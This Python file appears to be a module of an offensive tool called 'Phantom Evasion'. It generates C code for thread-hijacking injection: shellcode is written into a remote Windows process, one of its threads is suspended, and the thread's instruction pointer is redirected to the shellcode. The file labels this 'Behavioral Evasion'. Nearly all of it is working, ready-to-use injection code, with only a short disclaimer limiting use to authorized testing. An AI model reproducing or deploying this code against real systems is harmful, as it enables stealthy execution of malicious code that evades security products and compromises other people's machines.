"""
Phantom Evasion - Thread Hijacking Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_thread_hijack() -> Dict[str, Any]:
    """Generate C code for thread-hijacking shellcode injection.

    Steps:
        1. ``OpenProcess`` – obtain a handle to the target process.
        2. ``VirtualAllocEx`` – allocate RW memory in the remote process.
        3. ``WriteProcessMemory`` – copy shellcode into the allocation.
        4. ``VirtualProtectEx`` – change protection to RX (W^X).
        5. ``OpenThread`` / ``SuspendThread`` – suspend a thread.
        6. ``GetThreadContext`` – capture the thread CONTEXT (RIP).
        7. Set ``CONTEXT.Rip`` to the shellcode address.
        8. ``SetThreadContext`` – redirect execution.
        9. ``ResumeThread`` – continue the thread.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Thread Hijacking Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Redirects RIP of a live thread to shellcode without creating a new thread.

#ifndef PHANTOM_THREAD_HIJACK_INCLUDED
#define PHANTOM_THREAD_HIJACK_INCLUDED

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

/**
 * Return the first thread ID found in the given process (other than our own).
 */
static DWORD find_thread_in_process(DWORD pid) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return 0;

    THREADENTRY32 te = { .dwSize = sizeof(te) };
    DWORD tid = 0;

    if (Thread32First(hSnap, &te)) {
        do {
            if (te.th32OwnerProcessID == pid &&
                te.th32ThreadID != GetCurrentThreadId()) {
                tid = te.th32ThreadID;
                break;
            }
        } while (Thread32Next(hSnap, &te));
    }
    CloseHandle(hSnap);
    return tid;
}

/**
 * Inject shellcode into a remote process by hijacking a thread's RIP register.
 *
 * @param pid           Target process ID.
 * @param shellcode     Pointer to raw shellcode bytes.
 * @param shellcode_len Length of shellcode in bytes.
 * @return TRUE on success, FALSE on failure.
 */
static BOOL thread_hijack_inject(DWORD pid,
                                  unsigned char *shellcode,
                                  size_t shellcode_len) {
    // Open the target process
    HANDLE hProcess = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);
    if (!hProcess) return FALSE;

    // Allocate RW memory in the target process
    LPVOID remote_addr = VirtualAllocEx(hProcess, NULL, shellcode_len,
                                        MEM_COMMIT | MEM_RESERVE,
                                        PAGE_READWRITE);
    if (!remote_addr) {
        CloseHandle(hProcess);
        return FALSE;
    }

    // Write shellcode into the remote allocation
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess, remote_addr, shellcode,
                             shellcode_len, &written) ||
        written != shellcode_len) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Change protection to RX (no write)
    DWORD old_protect = 0;
    VirtualProtectEx(hProcess, remote_addr, shellcode_len,
                     PAGE_EXECUTE_READ, &old_protect);

    // Find a thread belonging to the target process
    DWORD tid = find_thread_in_process(pid);
    if (!tid) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Open and suspend the target thread
    HANDLE hThread = OpenThread(
        THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT,
        FALSE, tid);
    if (!hThread) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    if (SuspendThread(hThread) == (DWORD)-1) {
        CloseHandle(hThread);
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Capture thread context (x64)
    CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
    if (!GetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        CloseHandle(hThread);
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Redirect RIP to our shellcode
    ctx.Rip = (DWORD64)remote_addr;

    if (!SetThreadContext(hThread, &ctx)) {
        ResumeThread(hThread);
        CloseHandle(hThread);
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Resume the hijacked thread – it will now execute our shellcode
    ResumeThread(hThread);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return TRUE;
}

#endif /* PHANTOM_THREAD_HIJACK_INCLUDED */
"""

    return {
        "code": code,
        "description": (
            "Thread hijacking: suspend thread, redirect RIP to shellcode, "
            "resume (no new thread creation)"
        ),
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "thread_hijack",
    }
